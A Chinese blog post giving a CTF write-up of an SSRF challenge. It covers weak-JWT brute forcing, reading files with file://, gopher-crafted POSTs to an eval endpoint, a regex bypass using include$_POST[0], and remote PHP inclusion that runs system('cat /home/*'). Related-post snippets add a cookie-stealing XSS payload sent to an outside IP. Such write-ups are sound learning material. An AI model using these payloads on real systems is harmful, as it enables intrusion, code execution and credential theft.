一道ssrf

最新推荐文章于 2024-07-06 13:10:27 发布
最新推荐文章于 2024-07-06 13:10:27 发布
阅读量3.2k 收藏
点赞数 1
分类专栏: web ctf 文章标签: php web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jvkyvly/article/details/121340717
版权
ctf 同时被 2 个专栏收录
31 篇文章 1 订阅
订阅专栏
web
26 篇文章 0 订阅
订阅专栏

前言 : 我最开始写文章的初衷是为了写给自己看的,然后记录自己的学习,也给自己留个回忆吧(感觉这个挺有意思的),然后现在可能慢慢会在意下读者的感受,嘻嘻。。。

然后这个题也不难,就是ssrf没学好,基础不够牢,也没咋遇到,然后记录一下,感觉还有点小意思吧。。。

那个环境没了,eee就没有截图啦。。。

开始是一个平台,然后我们是guest用户,然后提示我们要成admin嘛(下面那个是后面的截图,之前的没了)
在这里插入图片描述
然后是弱密钥,爆破,密钥为12345,然后改成admin用户,然后跳转到/index.php?comment=http://127.0.0.1/console.php
很明显的一个ssrf嘛,然后用file协议读了一些文件

console.php

 <?php
error_reporting(0);
require("functions.php");
$com = $_POST['com'];
// if(ssrf_check() && Limit_command($comment)){
echo $com;
if(ssrf_check()){
    if(isset($_POST['com'])){
        if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\(|\{|\}|<|>|\s/i", $com)){
                // assert($com);
                eval($com);
            }else{
                die('hack');
            }
            }

}else{
    die('<script>alert("非本地访问")</script>');
}

echo '

functions.php

 <?php
require("jwt.php");

function check(){
    $Jwt_token=$_COOKIE['token'];
    $getPayload_test=Jwt::verifyToken($Jwt_token);
    if($getPayload_test){
        if($getPayload_test['username']==="admin"){
           return true;
        }
    }
    return false;
}

function ssrf_check(){
    //获取客户端ip
    if(getenv("REMOTE_ADDR")){
        $ip = getenv("REMOTE_ADDR");
    }
    if($ip==='127.0.0.1'){
        return true;
    }
    return false;
}



?>

然后大至思路就出来了,就是gopher打console.php

然后正则是用com=include$_POST[0];这个绕过的

下面就是构造POST请求了,这里就是ssrf搞的少,当时没有很快的搞出来,现去搜了一波
在这里插入图片描述

然后要注意一下Content-Length的值

然后这样后,下一步打算怎么操作呢,是直接这样传这个POST嘛
在这里插入图片描述
我开始是这样想,然后发现传是传过去了,但是打不通。。。
在这里插入图片描述
然后我换了种就是
在这里插入图片描述
然后打通了,但是没找到flag,然后感觉要rce才行。。。
然后试了其他协议吧,发现都不行。。。。然后最后发现可以包含外网。。那就简单了呀

然后用这个
在这里插入图片描述
这里有个细节,就是3.php的内容我开始写的是
<?php system('ls'); ?>

然后打过去的回显发现是自己vps上的当前目录的文件,猜测是直接把php的内容给执行了,就有点像pearcmd那个东西的一个方法那种,也是今天上午才搞那个,然后就联想到了,最后猜flag在/home下,拿下

最后用的3.php的代码

<?php
echo "<?php system('cat /home/*');system('ls /home');?>";
?>

在这里插入图片描述
然后bp里的那个post数据先url加密一次,然后%0a替换成%0d%0a,再加密一次,然后直接gopher打就好

Je3Z
关注
专栏目录
SSRF漏洞之FastCGI利用篇
weixin_39664643的博客
03-18 2269
SSRF漏洞之FastCGI利用篇 SSRF–(Server-side Request Forge, 服务端请求伪造) 定义:由攻击者构造的攻击链接传给服务端执行造成的漏洞,一般用来在外网探测或攻击内网服务 SSRF漏洞思维导图如下,本篇主要介绍利用SSRF漏洞攻击FastCGI 0x00.PHP-FPM FastCGI 未授权利用 首先我们使用Vulhub漏洞靶场快速搭建漏洞环境进行复现,感受一波漏洞的危害 # 保证实验vps具有git、docker、pip、docker-compose、python基
SSRF 漏洞解析
Lelouch_E的博客
10-17 435
漏洞原理 SSRF(服务端请求伪造)是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤和限制。如果从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。 Tips:除http/https等方式可以造成ssrf,类似tcp connect方式也可以探测内网一些ip的端
简单理解SSRF
weixin_50464560的博客
11-23 895
https://www.freebuf.com/articles/others-articles/247363.html ​1. 什么是SSRF1.1. 含义服务器端请求伪造(SSRF)是指攻击者能够从易受攻击的Web应用程序发送精心设计的请求的对其他网站进行攻击。(利用一个可发起网络请求的服务当作跳板来攻击其他服务)攻击者能够利用目标帮助攻击者访问其他想要攻击的目标攻击者要求服务器为他访问URL1.2. 有道翻译就曾经出现过ssrf导致内网地址被访问到1.3. 翻译网站发生S
一道XXE和SSRF的题目
weixin_33725515的博客
06-22 482
title: 一道XXE漏洞和SSRF结合的题目 date: 2018-01-14 16:47:59 tags: [writeup,ctf] 学校在考试周,ennnn.....搞了校赛 遇到了一道xxe和ssrf结合的题目,感觉挺不错的,简单记录一下 这里只记录下流程,具体的原理这里有几个链接(当时也是复习了一遍 前辈们比我写得好 未知攻焉知防——XXE漏洞攻防 XXE漏洞的简单理解和测试...
一道简单SSRF
m0_56059226的博客
05-15 744
看到了一道简单ssrf,由于说有非预期但是忘了这个知识点,所以还是记录一下 题目进去后就是一串代码 <?php highlight_file(__FILE__); //find something in flag1.php $d = $_GET['d']; $file = $_GET['ctf']; if (filter_var($d, FILTER_VALIDATE_URL)) { $r = parse_url($d); if (isset($file)) {
CUMT2021一道SSRF
flying_bird2019的博客
03-30 222
表面看起来是上传,其实是SSRF 首页给了提示,url参数查看flag.php,直接?url=flag.php啥也没有 想到用file://协议 可查看源码 再看一下主页的源码 这里可以看到有curl,因此想到是SSRF 分析flag.php源码,不能直接上传文件,需要跳转服务器的地址为127.0.0.1 而且$_SERVER[“REMOTE_ADDR”]无法伪造 结合主页,我们可以用curl支持的gopher协议让服务器给自己传一个post数据包,上传一个一句话 gopher协议在SSRF中应用 给
字节跳动 CTF 2021 线下决赛的一道 Web 题源码,主要考察 SSRF.zip
05-01
字节跳动 CTF 2021 线下决赛的一道 Web 题源码,主要考察 SSRF.zip
SSRF】
最新发布
qq_58553228的博客
07-06 254
SSRF (Server-Side Request Forgery 服务端请求伪造)
CTF之web学习记录 -- SSRF
lifanxin的博客
06-29 1986
SSRF概述SSRF原理SSRF漏洞修复一道例题总结 概述   SSRF(Server-Side Request Forgery)服务器端请求伪造,是一种由攻击者构造请求,服务器端发起请求的安全漏洞。当然之所以要这样曲折,是因为SSRF的目标一般是外网无法访问的内部系统,所以需要用服务器端发送。 SSRF原理   SSRF形成的原因在于服务器端提供了从其它服务器应用获取数据的功能且没有对目标地址做过滤和限制。通过该漏洞我们可以攻击内网的服务器,获取相应的资源信息,利用file协议读取内部网络文件等。   如
SSRF
love4amanda的博客
02-05 224
简介 SSRF指服务器端请求伪造: 由攻击者构造形成由服务端发起请求的一个安全漏洞.往往用于突破内网的访问限制. 解释:多数公司的内网系统是不对外部开放的,特别是金融领域. 由于之前在XXE的修复中其实就存在SSRF漏洞,这里做一些补充,便于后续伙伴理解. 如果小伙伴理解CSRF那么就很容易理解SSRF;前者是客户端请求伪造后者是 危害 主要体现在内网端口扫描和文件读写,当然也可以对内网应用进行攻...
web安全SSRF的各种利用方式
HBohan的博客
04-19 1883
什么是SSRF SSRF(服务端请求伪造漏洞) 由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。 一般情况下,SSRF针对的都是一些外网无法访问的内网,所以需要SSRF使目标后端去访问内网,进而达到我们攻击内网的目的。 通过SSRF,我们可以访问目标内网的redis服务,mysql服务,smpt服务,fastcgi服务等 造成漏洞的一些函数 file_get_contents():将整
VNCTF2022 web wp
热门推荐
Je3Z的博客
02-13 1万+
GameV4.0 js/data.js下有段FLAG的base64加密 Vk5DVEYlN0JXZWxjb21lX3RvX1ZOQ1RGMjAyMiU3RA== 解码就行 VNCTF{Welcome_to_VNCTF2022} gocalc0 是个xss,没有过滤,前几次一直不行,session解密木得flag,不知道最后怎么又可以了,www <script>window.open('http://ip:7777/'+document.cookie)</script> 然后把ses
2021年四川省大学生网络安全技能大赛 部分wp
Je3Z的博客
05-15 2586
加密解密 easy_pyc 在线反编译得到 #!/usr/bin/env python # visit http://tool.lu/pyc/ for more information import base64 def encode(yourflag): s = '' for i in yourflag: x = ord(i) ^ 62 x = x + 6 s += chr(x) return base64.b64enc
[网鼎杯2018]Unfinish&&CTFSHOW内部赛签到题
Je3Z的博客
07-15 1635
CTFSHOW那个是根据[网鼎杯2018]Unfinish改编的,有个源码泄露友好些吧,然后过滤的东西不一样,然后感觉不错就总结下 然后扫目录的时候有源码泄露www.zip,下载后读下代码 user.php <?php include('db.php'); session_start(); error_reporting(0); if($_SESSION['u']){ $username=$_SESSION['u']; if (is_numeric($username)) { if(strl
ISCC ISCC客服一号冲冲冲(二)
Je3Z的博客
05-13 1521
这个题其实是转自Bugku的Login4 (CBC字节翻转攻击) 题目有提示密码就是web1 的flag 然后登入 这里有回显,然后我们换一下 下面cookie里的iv和cipher看着就像CBC加密的方式 利用的就是CBC解密的特点:前16个密文字符用来解密接下来的一组16个密文,就是说通过改变前16个密文就可以改变下面16个密文解密的结果,这就是字符翻转攻击。具体原理看链接,解释的挺详细。 重点来说CBC的加密方式吧,我理解的就是16个一组,然后密文第一组会和初始化向量(就是iv)进行异或运算
CTFHUB web进阶学习
Je3Z的博客
09-12 1431
CTFHub之web进阶学习 Linux 动态加载器 ctfhub 动态加载器 linux–>ldd命令的介绍 就是没有x执行程序的权限,然后我们要执行/readflag来拿到flag,这里就用到了linux动态库链接器/加载器ld-linux.so.2 这里我们直接ldd /readflag 列出所需要得动态链接库 然后再/lib64/ld-linux-x86-64.so.2 /readflag 即可获取flag php Bypass disable_function LD_PRELOAD Linu
misc入门 部分wp(持续更新)
Je3Z的博客
06-22 1307
misc3 查看bpg文件 .\bpgview.exe 文件路径 下载地址 misc11 提示:flag在另一张图里。 放入tweakpng中,删除一个IDAT块,保存为新的图片。得到flag misc12 提示:flag在另一张图里。 做法与11一模一样,然后只是一个一个IDAT块删完然后保存下来得到flag。我映像中应该是删了5次。 misc13 提示:flag位置在图片末尾。 这里把这串字符的十六进制数值复制下来,按照规律选取正确的数值,直接搞不行。。。。。 s="631A74B96685738
CTFSHOW SSTI web369-web372 拼接绕过
Je3Z的博客
03-28 1009
知识点: ()|select|string 结果如下 <generator object select_or_reject at 0x0000022717FF33C0> (()|select|string)[24]~ (()|select|string)[24]~ (()|select|string)[15]~ (()|select|string)[20]~ (()|select|string)[6]~ (()|select|string)[18]~ (()|select|string)[18
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值